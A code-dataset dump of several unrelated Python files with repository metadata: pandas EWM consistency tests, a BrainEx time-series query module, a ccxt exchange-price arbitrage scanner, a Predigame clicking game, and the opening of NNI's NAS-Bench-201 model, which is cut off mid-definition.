if not fn_set_wrap: fn_set_wrap = lambda v: v
oself = self
class GetSet:
def get(self):
return fn_get_wrap(oself[key])
def set(self, v):
v = fn_set_wrap(v)
if oself[key] != v:
oself[key] = v
return GetSet()
def __init__(self, filename=None, version=None):
self._filename = filename
self._version = version
self._db = None
def __call__(self, cls):
upd = getattr(cls, 'update', None)
if upd:
u = upd
def wrap():
def upd_wrap(*args, **kwargs):
u(None)
return upd_wrap
upd = wrap()
self._db = PersistentOptions.WrappedDict(cls, self._filename, self._version, cls.defaults, upd)
db = self._db
class WrappedClass:
def __init__(self, *args, **kwargs):
self._db = db
self._def = cls.defaults
def __getitem__(self, key):
return self._db[key]
def __setitem__(self, key, val):
self._db[key] = val
def keys(self):
return self._db.keys()
def reset(self):
self._db.reset()
def clean(self):
self._db.clean()
def gettersetter(self, key, fn_get_wrap=None, fn_set_wrap=None):
return self._db.gettersetter(key, fn_get_wrap=fn_get_wrap, fn_set_wrap=fn_set_wrap)
return WrappedClass
| en | 0.79794 | Copyright (C) 2021 CG Cookie http://cgcookie.com <EMAIL> Created by <NAME>, <NAME> This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. # ('line','linenum','% 10d'), {" " * data['nested']}Timing {label} {data['last']}: {time_delta:0.4f}s {" " * data['nested']}{time_delta:0.4f}s # corrected bug in previous version of blender_version fn wrapper # https://github.com/CGCookie/retopoflow/commit/135746c7b4ee0052ad0c1842084b9ab983726b33#diff-d4260a97dcac93f76328dfaeb5c87688 | 2.131099 | 2 |
venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | 28899 | 10345 | import numpy as np
import pytest
from pandas import (
DataFrame,
Series,
concat,
)
import pandas._testing as tm
@pytest.mark.parametrize("func", ["cov", "corr"])
def test_ewm_pairwise_cov_corr(func, frame):
result = getattr(frame.ewm(span=10, min_periods=5), func)()
result = result.loc[(slice(None), 1), 5]
result.index = result.index.droplevel(1)
expected = getattr(frame[1].ewm(span=10, min_periods=5), func)(frame[5])
tm.assert_series_equal(result, expected, check_names=False)
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov(name):
A = Series(np.random.randn(50), index=np.arange(50))
B = A[2:] + np.random.randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = getattr(A.ewm(com=20, min_periods=5), name)(B)
assert np.isnan(result.values[:14]).all()
assert not np.isnan(result.values[14:]).any()
@pytest.mark.parametrize("min_periods", [0, 1, 2])
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov_min_periods(name, min_periods):
# GH 7898
A = Series(np.random.randn(50), index=np.arange(50))
B = A[2:] + np.random.randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = getattr(A.ewm(com=20, min_periods=min_periods), name)(B)
# binary functions (ewmcov, ewmcorr) with bias=False require at
# least two values
assert np.isnan(result.values[:11]).all()
assert not np.isnan(result.values[11:]).any()
# check series of length 0
empty = Series([], dtype=np.float64)
result = getattr(empty.ewm(com=50, min_periods=min_periods), name)(empty)
tm.assert_series_equal(result, empty)
# check series of length 1
result = getattr(Series([1.0]).ewm(com=50, min_periods=min_periods), name)(
Series([1.0])
)
tm.assert_series_equal(result, Series([np.NaN]))
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_different_input_array_raise_exception(name):
A = Series(np.random.randn(50), index=np.arange(50))
A[:10] = np.NaN
msg = "other must be a DataFrame or Series"
    # pandas raises ValueError when `other` is not a DataFrame or Series
with pytest.raises(ValueError, match=msg):
getattr(A.ewm(com=20, min_periods=5), name)(np.random.randn(50))
def create_mock_weights(obj, com, adjust, ignore_na):
if isinstance(obj, DataFrame):
if not len(obj.columns):
return DataFrame(index=obj.index, columns=obj.columns)
w = concat(
[
create_mock_series_weights(
obj.iloc[:, i], com=com, adjust=adjust, ignore_na=ignore_na
)
for i, _ in enumerate(obj.columns)
],
axis=1,
)
w.index = obj.index
w.columns = obj.columns
return w
else:
return create_mock_series_weights(obj, com, adjust, ignore_na)
def create_mock_series_weights(s, com, adjust, ignore_na):
w = Series(np.nan, index=s.index)
alpha = 1.0 / (1.0 + com)
if adjust:
count = 0
for i in range(len(s)):
            if s.iat[i] == s.iat[i]:  # NaN != NaN, so True only for non-NaN values
w.iat[i] = pow(1.0 / (1.0 - alpha), count)
count += 1
elif not ignore_na:
count += 1
else:
sum_wts = 0.0
prev_i = -1
count = 0
for i in range(len(s)):
            if s.iat[i] == s.iat[i]:  # non-NaN check (NaN != NaN)
if prev_i == -1:
w.iat[i] = 1.0
else:
w.iat[i] = alpha * sum_wts / pow(1.0 - alpha, count - prev_i)
sum_wts += w.iat[i]
prev_i = count
count += 1
elif not ignore_na:
count += 1
return w
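# A worked example of the adjusted branch above: for s = [1.0, NaN, 2.0]
# with com = 1 (alpha = 0.5), adjust=True, ignore_na=False, the loop
# yields w = [1.0, NaN, 4.0] -- the NaN still advances `count`, so the
# last weight is (1 / (1 - alpha)) ** 2 == 4.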
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_mean(consistency_data, adjust, ignore_na, min_periods):
x, is_constant, no_nans = consistency_data
com = 3.0
result = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
expected = (
x.multiply(weights).cumsum().divide(weights.cumsum()).fillna(method="ffill")
)
expected[
x.expanding().count() < (max(min_periods, 1) if min_periods else 1)
] = np.nan
tm.assert_equal(result, expected.astype("float64"))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_consistent(consistency_data, adjust, ignore_na, min_periods):
x, is_constant, no_nans = consistency_data
com = 3.0
if is_constant:
count_x = x.expanding().count()
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
# check that correlation of a series with itself is either 1 or NaN
corr_x_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).corr(x)
exp = x.max() if isinstance(x, Series) else x.max().max()
# check mean of constant series
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = exp
tm.assert_equal(mean_x, expected)
# check correlation of constant series with itself is NaN
expected[:] = np.nan
tm.assert_equal(corr_x_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_var_debiasing_factors(
consistency_data, adjust, ignore_na, min_periods
):
x, is_constant, no_nans = consistency_data
com = 3.0
# check variance debiasing factors
var_unbiased_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=False)
var_biased_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=True)
weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
cum_sum = weights.cumsum().fillna(method="ffill")
cum_sum_sq = (weights * weights).cumsum().fillna(method="ffill")
numerator = cum_sum * cum_sum
denominator = numerator - cum_sum_sq
denominator[denominator <= 0.0] = np.nan
var_debiasing_factors_x = numerator / denominator
tm.assert_equal(var_unbiased_x, var_biased_x * var_debiasing_factors_x)
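# Restated as a formula: with W = cumsum(weights) and S = cumsum(weights**2),
# the factor computed above is W**2 / (W**2 - S), the usual reliability-weights
# bias correction, so var_unbiased == var_biased * factor wherever W**2 > S.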
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
assert not (var_x < 0).any().any()
if bias:
# check that biased var(x) == mean(x^2) - mean(x)^2
mean_x2 = (
(x * x)
.ewm(com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na)
.mean()
)
tm.assert_equal(var_x, mean_x2 - (mean_x * mean_x))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var_constant(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
if is_constant:
count_x = x.expanding(min_periods=min_periods).count()
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
# check that variance of constant series is identically 0
assert not (var_x > 0).any().any()
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = 0.0
if not bias:
expected[count_x < 2] = np.nan
tm.assert_equal(var_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_std(consistency_data, adjust, ignore_na, min_periods, bias):
x, is_constant, no_nans = consistency_data
com = 3.0
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
std_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
assert not (var_x < 0).any().any()
assert not (std_x < 0).any().any()
# check that var(x) == std(x)^2
tm.assert_equal(var_x, std_x * std_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_cov(consistency_data, adjust, ignore_na, min_periods, bias):
x, is_constant, no_nans = consistency_data
com = 3.0
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
assert not (var_x < 0).any().any()
cov_x_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).cov(x, bias=bias)
assert not (cov_x_x < 0).any().any()
# check that var(x) == cov(x, x)
tm.assert_equal(var_x, cov_x_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_series_cov_corr(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
if isinstance(x, Series):
var_x_plus_y = (
(x + x)
.ewm(com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na)
.var(bias=bias)
)
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
var_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
cov_x_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).cov(x, bias=bias)
# check that cov(x, y) == (var(x+y) - var(x) -
# var(y)) / 2
tm.assert_equal(cov_x_y, 0.5 * (var_x_plus_y - var_x - var_y))
# check that corr(x, y) == cov(x, y) / (std(x) *
# std(y))
corr_x_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).corr(x, bias=bias)
std_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
std_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
tm.assert_equal(corr_x_y, cov_x_y / (std_x * std_y))
if bias:
# check that biased cov(x, y) == mean(x*y) -
# mean(x)*mean(y)
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
mean_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
mean_x_times_y = (
(x * x)
.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
)
.mean()
)
tm.assert_equal(cov_x_y, mean_x_times_y - (mean_x * mean_y))
| en | 0.855206 | # GH 7898 # binary functions (ewmcov, ewmcorr) with bias=False require at # least two values # check series of length 0 # check series of length 1 # exception raised is Exception # check that correlation of a series with itself is either 1 or NaN # check mean of constant series # check correlation of constant series with itself is NaN # check variance debiasing factors # check that biased var(x) == mean(x^2) - mean(x)^2 # check that variance of constant series is identically 0 # check that var(x) == std(x)^2 # check that var(x) == cov(x, x) # check that cov(x, y) == (var(x+y) - var(x) - # var(y)) / 2 # check that corr(x, y) == cov(x, y) / (std(x) * # std(y)) # check that biased cov(x, y) == mean(x*y) - # mean(x)*mean(y) | 2.343834 | 2 |
brainex/query.py | ebuntel/BrainExTemp | 1 | 10346 |
# TODO finish implementing query
import math
from pyspark import SparkContext
# from genex.cluster import sim_between_seq
from brainex.op.query_op import sim_between_seq
from brainex.parse import strip_function, remove_trailing_zeros
from .classes import Sequence
from brainex.database import genexengine
def query(q: Sequence, gc: genexengine, loi: list, sc: SparkContext,
k:int=1, ex_sameID: bool=False, overlap: float= 1.0, mode:str='genex'):
"""
:param q: query sequence
:param gc: Gcluster in which to query
    :param loi: list of two integers giving the query length range; if None, all lengths are queried
:param sc: spark context on which to run the query operation
:param k: integer, specifying to return top k matches
    :param ex_sameID: boolean, whether to exclude sequences from the time series with the same id as the query sequence
    :param overlap: float, maximum allowed overlap between query lookups
:param mode: query mode, supported modes are 'genex' and 'bf' (bf = brute force)
"""
    if mode == 'genex':
        # TODO: plumb the query/cluster arguments through once the engine
        # query path is finished (see the module-level TODO above)
        gquery()
elif mode == 'bf':
bfquery()
else:
raise Exception('Unsupported query mode: ' + mode)
def get_query_from_dict():
pass
def get_query_sequence_from_file(file: str):
resList = []
with open(file, 'r') as f:
        for i, line in enumerate(f):
            if not i:
                # the first line holds the feature (header) columns
                features = list(map(lambda x: strip_function(x),
                                    line.strip()[:-1].split(',')))
            if line != "" and line != "\n":
                # everything after the feature columns is series data
                data = remove_trailing_zeros(line.split(",")[:-1])
                series_data = data[len(features):]
resList.append(series_data)
if len(resList[0]) == 0:
return resList[1:]
else:
return resList
def gquery(query_list: list, gc_data: dict, loi: list, input_list: list,
k:int=1, ex_sameID: bool=False, overlap: float= 1.0, ):
"""
Because Gcluster object doesn't have map property, we have to use dict as input
    :param query_list:
:param gc_data:
:param loi:
:param input_list:
:param k:
:param ex_sameID:
:param overlap:
:return:
"""
# get query from id, start, end point
# get query from csv file
#
# query_list = []
# query_set = get_query_from_csv_with_id(file)
# print(query_set)
# for cur_query in query_set:
# query_list.append(get_query_from_sequence(cur_query[0], int(cur_query[1]), int(cur_query[2]), input_list))
# print(query_list)
return custom_query(query_list, loi, gc_data, k, input_list)
def bfquery():
print()
#
# def custom_query_operation(q: Sequence, gc: Gcluster, loi: list, sc: SparkContext,
# k:int=1, ex_sameID: bool=False, overlap: float= 1.0):
#
# query_result = filter_rdd_back.repartition(16).map(
# lambda clusters: custom_query(q, loi, gc, k,
# global_time_series_dict.value, ))
# # changed here
# # plot_query_result(query_sequence, query_result, global_time_series_dict.value)
# return query_result
def get_query_from_sequence(id: tuple, start: int, end: int, input_list: list):
"""
:param id:
:param start:
:param end:
:param input_list:
:return: a list
"""
try:
input_dict = dict(input_list) # validate by converting input_list into a dict
except (TypeError, ValueError):
raise Exception('sequence: fetch_data: input_list is not key-value pair.')
return input_dict[id][start: end]
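# A hypothetical call (identifiers are illustrative, not from this codebase):
# input_list = [(('series-1',), [0.1, 0.2, 0.3, 0.4])]
# get_query_from_sequence(('series-1',), 1, 3, input_list)  ->  [0.2, 0.3]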
def custom_query(query_sequences: list, loi: list, Gcluster_data:dict, k : int, input_list:list):
# """
#
# :param query_sequences: list of list: the list of sequences to be queried
# :param cluster: dict[key = representative, value = list of timeSeriesObj] -> representative is timeSeriesObj
# the sequences in the cluster are all of the SAME length
# :param k: int
# :return list of time series objects: best k matches. Again note they are all of the SAME length
# """
"""
:param query_sequences:
:param query_range:
:param Gcluster_data:
:param k:
:param input_list:
:return:
"""
# get query from csv file which contains lists of list of query actual clusters
# get query from csv file which contains lists of tuple of id, start, endpoint
query_result = dict()
if not isinstance(query_sequences, list) or len(query_sequences) == 0:
raise ValueError("query sequence must be a list and not empty")
cur_query_number = 0
if isinstance(query_sequences[0], list):
print("length of query is [" + str(len(query_sequences)) + "]" + "[" + str(len(query_sequences[0])) + "]")
print("query is a list of list")
for cur_query in query_sequences:
if isinstance(cur_query, list):
query_result[cur_query_number] = get_most_k_sim(cur_query, loi, Gcluster_data, k, input_list)
cur_query_number += 1
return query_result
else:
return get_most_k_sim(query_sequences, loi, Gcluster_data, k, input_list)
def get_most_k_sim(query_sequence: list, loi: list, Gcluster_data : dict, k, input_list:list):
"""
:param query_sequence:
:param query_range:
:param Gcluster_data:
:param k:
:param input_list:
:return:
"""
min_rprs = None # the representative that is closest to the query distance
min_dist = math.inf
target_cluster = []
print("length of gcluster clusters is " + str(len(Gcluster_data[1])))
for cur_rprs_seq in Gcluster_data[1].keys():
# TODO do we want to get raw clusters here, or set the raw in timeSeriesObj before calling query (no parsing)
if (cur_rprs_seq.end - cur_rprs_seq.start + 1) in range(loi[0], loi[1] + 1):
# modify here, not use get clusters from objects, use values
cur_dist = sim_between_seq(query_sequence, cur_rprs_seq.fetch_data(input_list))
if cur_dist < min_dist:
min_rprs = cur_rprs_seq
min_dist = cur_dist
else:
break
if min_rprs:
print('min representative is ' + min_rprs.__str__())
        print('min dist ' + str(min_dist))
# print("Querying Cluster of length: " + str(len(get_data_for_timeSeriesObj(min_rprs, time_series_dict))))
target_cluster = Gcluster_data[1].get(min_rprs)
print('len of cluster is ' + str(len(target_cluster)))
# print("sorting")
#
target_cluster.sort(key=lambda cluster_sequence: sim_between_seq(query_sequence,
cluster_sequence.data))
k = int(k)
return target_cluster[0:k] # return the k most similar sequences
else:
return None
| en | 0.675752 | # TODO finish implementing query # from genex.cluster import sim_between_seq :param q: query sequence :param gc: Gcluster in which to query :param loi: list of two integer values, specifying the query range, if set to None, is going to query all length :param sc: spark context on which to run the query operation :param k: integer, specifying to return top k matches :param ex_sameID: boolean, whether to include sequences from the time series with the same id as the query sequence :param overlap: float, how much overlapping between queries lookups :param mode: query mode, supported modes are 'genex' and 'bf' (bf = brute force) Because Gcluster object doesn't have map property, we have to use dict as input :param file: :param gc_data: :param loi: :param input_list: :param k: :param ex_sameID: :param overlap: :return: # get query from id, start, end point # get query from csv file # # query_list = [] # query_set = get_query_from_csv_with_id(file) # print(query_set) # for cur_query in query_set: # query_list.append(get_query_from_sequence(cur_query[0], int(cur_query[1]), int(cur_query[2]), input_list)) # print(query_list) # # def custom_query_operation(q: Sequence, gc: Gcluster, loi: list, sc: SparkContext, # k:int=1, ex_sameID: bool=False, overlap: float= 1.0): # # query_result = filter_rdd_back.repartition(16).map( # lambda clusters: custom_query(q, loi, gc, k, # global_time_series_dict.value, )) # # changed here # # plot_query_result(query_sequence, query_result, global_time_series_dict.value) # return query_result :param id: :param start: :param end: :param input_list: :return: a list # validate by converting input_list into a dict # """ # # :param query_sequences: list of list: the list of sequences to be queried # :param cluster: dict[key = representative, value = list of timeSeriesObj] -> representative is timeSeriesObj # the sequences in the cluster are all of the SAME length # :param k: int # :return list of time series objects: best k matches. Again note they are all of the SAME length # """ :param query_sequences: :param query_range: :param Gcluster_data: :param k: :param input_list: :return: # get query from csv file which contains lists of list of query actual clusters # get query from csv file which contains lists of tuple of id, start, endpoint :param query_sequence: :param query_range: :param Gcluster_data: :param k: :param input_list: :return: # the representative that is closest to the query distance # TODO do we want to get raw clusters here, or set the raw in timeSeriesObj before calling query (no parsing) # modify here, not use get clusters from objects, use values # print("Querying Cluster of length: " + str(len(get_data_for_timeSeriesObj(min_rprs, time_series_dict)))) # print("sorting") # # return the k most similar sequences | 2.598485 | 3 |
main.py | orgr/arbitrage_bot | 0 | 10347 |
import sys
import time
from typing import List
import asyncio
import ccxt.async_support as ccxt
# import ccxt
import itertools
from enum import Enum
class Color(Enum):
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
RESET = '\033[0m'
def colorize(s, color: Color):
# return color.value + s + Color.RESET.value
return "{}{}{}".format(color.value, s, Color.RESET.value)
def green(s):
return colorize(s, Color.GREEN)
def yellow(s):
return colorize(s, Color.YELLOW)
def red(s):
return colorize(s, Color.RED)
class ArbitrageOpportunity(Enum):
NONE = 0
BUY = 1
SELL = 2
def __str__(self):
return self.name
def get_complementary_trade(t: ArbitrageOpportunity):
assert (t != ArbitrageOpportunity.NONE)
return ArbitrageOpportunity.BUY if t == ArbitrageOpportunity.SELL else ArbitrageOpportunity.SELL
class Price:
def __init__(self, exchange, symbol, bid, ask):
self.exchange = exchange
self.symbol = symbol
self.bid = bid
self.ask = ask
def is_opportunity(self, other):
if self.bid > other.ask:
return ArbitrageOpportunity.BUY # buy from other exchange
if self.ask < other.bid:
return ArbitrageOpportunity.SELL # buy from this exchange
return ArbitrageOpportunity.NONE
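# A sanity example with made-up quotes: if this exchange shows bid=101/ask=102
# and the other shows bid=99/ask=100, then
# Price(ex_a, 'BTC/USDT', 101, 102).is_opportunity(Price(ex_b, 'BTC/USDT', 99, 100))
# returns ArbitrageOpportunity.BUY -- buy on the other exchange at 100, sell here at 101.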
def compare_prices(p1: Price, p2: Price):
return p1.is_opportunity(p2)
async def get_price(symbol, exchange) -> Price:
orderbook = await exchange.fetch_order_book(symbol, 10)
bid = orderbook['bids'][0][0] if len(orderbook['bids']) > 0 else None
ask = orderbook['asks'][0][0] if len(orderbook['asks']) > 0 else None
# spread = (ask - bid) if (bid and ask) else None
# print(ex.id, 'market price', {'bid': bid, 'ask': ask, 'spread': spread})
if bid is None or ask is None:
return None
return Price(exchange, symbol, float(bid), float(ask))
async def main():
if len(sys.argv) < 3:
print("Usage: python {} <exchange id 1> <exchange id 2> ...".format(sys.argv[0]))
return
exchanges = []
try:
# initialize exchanges
tasks = []
for ex_id in sys.argv[1:]:
try:
ex = getattr(ccxt, ex_id)({'enableRateLimit': True}) # type: ccxt.Exchange
# ex.set_sandbox_mode(enabled=True)
except AttributeError:
print("{} is not supported".format(ex_id))
return
except ccxt.NotSupported:
print("{} paper trading is not supported".format(ex_id))
return
tasks.append(asyncio.create_task(ex.load_markets()))
exchanges.append(ex)
[await t for t in tasks]
all_symbols = [symbol for ex in exchanges for symbol in ex.symbols]
unique_arbitrable_symbols = set([symbol for symbol in all_symbols if all_symbols.count(symbol) > 1])
for symbol in unique_arbitrable_symbols:
tasks = []
for ex in exchanges:
tasks.append(asyncio.create_task(get_price(symbol, ex)))
[await t for t in tasks]
prices = [t.result() for t in tasks]
if len(prices) > 1:
arbitrage_pairs = itertools.combinations(prices, r=2)
for p in arbitrage_pairs:
opportunity = compare_prices(p[0], p[1])
if opportunity != ArbitrageOpportunity.NONE:
print(green("{}: {} from {}, {} from {}".format(symbol, opportunity, p[1].exchange.id,
get_complementary_trade(opportunity),
p[0].exchange.id)))
else:
print(yellow(symbol))
# close all connections on KeyboardInterrupts and errors
finally:
[await ex.close() for ex in exchanges]
if __name__ == '__main__':
asyncio.run(main())
| en | 0.631917 | # import ccxt # return color.value + s + Color.RESET.value # buy from other exchange # buy from this exchange # spread = (ask - bid) if (bid and ask) else None # print(ex.id, 'market price', {'bid': bid, 'ask': ask, 'spread': spread}) # initialize exchanges # type: ccxt.Exchange # ex.set_sandbox_mode(enabled=True) # close all connections on KeyboardInterrupts and errors | 2.770407 | 3
examples/click-ninja/clickninja-final.py | predicatemike/predigame | 0 | 10348 | WIDTH = 20
HEIGHT = 14
TITLE = 'Click Ninja'
BACKGROUND = 'board'
def destroy(s):
sound('swoosh')
if s.name == 'taco':
score(50)
else:
score(5)
# draw a splatting image at the center position of the image
image('redsplat', center=s.event_pos, size=2).fade(1.0)
s.fade(0.25)
def failure(s):
score(-20)
if s.name == 'bomb':
s.destroy()
image('explode', center=s.center, size=10).pulse(0.05)
if s.name == 'bomb' or score() < 0:
sound('scream')
text('You Survived %s seconds' % time(), MAROON)
callback(gameover, 0.01)
def spawn():
speed = randint(2, 10)
size = randint(1,4)
target = choice(['bananas', 'cherries',
'olives', 'ham', 'hotdog',
'fries','icee', 'pizza'])
if randint(1, 4) == 2:
target = 'bomb'
if randint(1, 10) == 5:
target = 'taco'
sound('launch')
arc = rand_arc()
s = image(target, arc[0], size=size)
if target == 'bomb':
s.speed(speed).spin(1).clicked(failure)
s.move_to(arc[1], arc[2], callback = s.destroy)
elif target == 'taco':
s.speed(5).spin().clicked(destroy)
s.move_to((-10, -2), (-5, HEIGHT/2), (WIDTH+1, HEIGHT/2), callback = s.destroy)
else:
s.speed(speed).clicked(destroy)
s.move_to(arc[1], arc[2], callback = lambda: failure(s))
callback(spawn, rand(0.1, 3))
score(color = PURPLE)
callback(spawn, 1)
keydown('r', reset)
| en | 0.850029 | # draw a splatting image at the center position of the image | 3.088893 | 3 |
nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 2,305 | 10349 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Callable, Dict
import torch
import torch.nn as nn
from nni.retiarii import model_wrapper
from nni.retiarii.nn.pytorch import NasBench201Cell
__all__ = ['NasBench201']
OPS_WITH_STRIDE = {
'none': lambda C_in, C_out, stride: Zero(C_in, C_out, stride),
'avg_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'avg'),
'max_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'max'),
'conv_3x3': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (3, 3), (stride, stride), (1, 1), (1, 1)),
'conv_1x1': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (1, 1), (stride, stride), (0, 0), (1, 1)),
'skip_connect': lambda C_in, C_out, stride: nn.Identity() if stride == 1 and C_in == C_out
else FactorizedReduce(C_in, C_out, stride),
}
PRIMITIVES = ['none', 'skip_connect', 'conv_1x1', 'conv_3x3', 'avg_pool_3x3']
class ReLUConvBN(nn.Module):
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
super(ReLUConvBN, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_out, kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(C_out)
)
def forward(self, x):
return self.op(x)
class SepConv(nn.Module):
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
super(SepConv, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_in, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=C_in, bias=False),
nn.Conv2d(C_in, C_out, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(C_out),
)
def forward(self, x):
return self.op(x)
class Pooling(nn.Module):
def __init__(self, C_in, C_out, stride, mode):
super(Pooling, self).__init__()
if C_in == C_out:
self.preprocess = None
else:
self.preprocess = ReLUConvBN(C_in, C_out, 1, 1, 0, 1)
if mode == 'avg':
self.op = nn.AvgPool2d(3, stride=stride, padding=1, count_include_pad=False)
elif mode == 'max':
self.op = nn.MaxPool2d(3, stride=stride, padding=1)
else:
raise ValueError('Invalid mode={:} in Pooling'.format(mode))
def forward(self, x):
if self.preprocess:
x = self.preprocess(x)
return self.op(x)
class Zero(nn.Module):
def __init__(self, C_in, C_out, stride):
super(Zero, self).__init__()
self.C_in = C_in
self.C_out = C_out
self.stride = stride
self.is_zero = True
def forward(self, x):
if self.C_in == self.C_out:
if self.stride == 1:
return x.mul(0.)
else:
return x[:, :, ::self.stride, ::self.stride].mul(0.)
else:
shape = list(x.shape)
shape[1] = self.C_out
zeros = x.new_zeros(shape, dtype=x.dtype, device=x.device)
return zeros
class FactorizedReduce(nn.Module):
def __init__(self, C_in, C_out, stride):
super(FactorizedReduce, self).__init__()
self.stride = stride
self.C_in = C_in
self.C_out = C_out
self.relu = nn.ReLU(inplace=False)
if stride == 2:
C_outs = [C_out // 2, C_out - C_out // 2]
self.convs = nn.ModuleList()
for i in range(2):
self.convs.append(nn.Conv2d(C_in, C_outs[i], 1, stride=stride, padding=0, bias=False))
self.pad = nn.ConstantPad2d((0, 1, 0, 1), 0)
else:
raise ValueError('Invalid stride : {:}'.format(stride))
self.bn = nn.BatchNorm2d(C_out)
def forward(self, x):
x = self.relu(x)
y = self.pad(x)
out = torch.cat([self.convs[0](x), self.convs[1](y[:, :, 1:, 1:])], dim=1)
out = self.bn(out)
return out
class ResNetBasicblock(nn.Module):
def __init__(self, inplanes, planes, stride):
super(ResNetBasicblock, self).__init__()
assert stride == 1 or stride == 2, 'invalid stride {:}'.format(stride)
self.conv_a = ReLUConvBN(inplanes, planes, 3, stride, 1, 1)
self.conv_b = ReLUConvBN(planes, planes, 3, 1, 1, 1)
if stride == 2:
self.downsample = nn.Sequential(
nn.AvgPool2d(kernel_size=2, stride=2, padding=0),
nn.Conv2d(inplanes, planes, kernel_size=1, stride=1, padding=0, bias=False))
elif inplanes != planes:
self.downsample = ReLUConvBN(inplanes, planes, 1, 1, 0, 1)
else:
self.downsample = None
self.in_dim = inplanes
self.out_dim = planes
self.stride = stride
self.num_conv = 2
def forward(self, inputs):
basicblock = self.conv_a(inputs)
basicblock = self.conv_b(basicblock)
if self.downsample is not None:
inputs = self.downsample(inputs) # residual
return inputs + basicblock
@model_wrapper
class NasBench201(nn.Module):
"""The full search space proposed by `NAS-Bench-201 <https://arxiv.org/abs/2001.00326>`__.
It's a stack of :class:`NasBench201Cell`.
"""
def __init__(self,
stem_out_channels: int = 16,
num_modules_per_stack: int = 5,
num_labels: int = 10):
super().__init__()
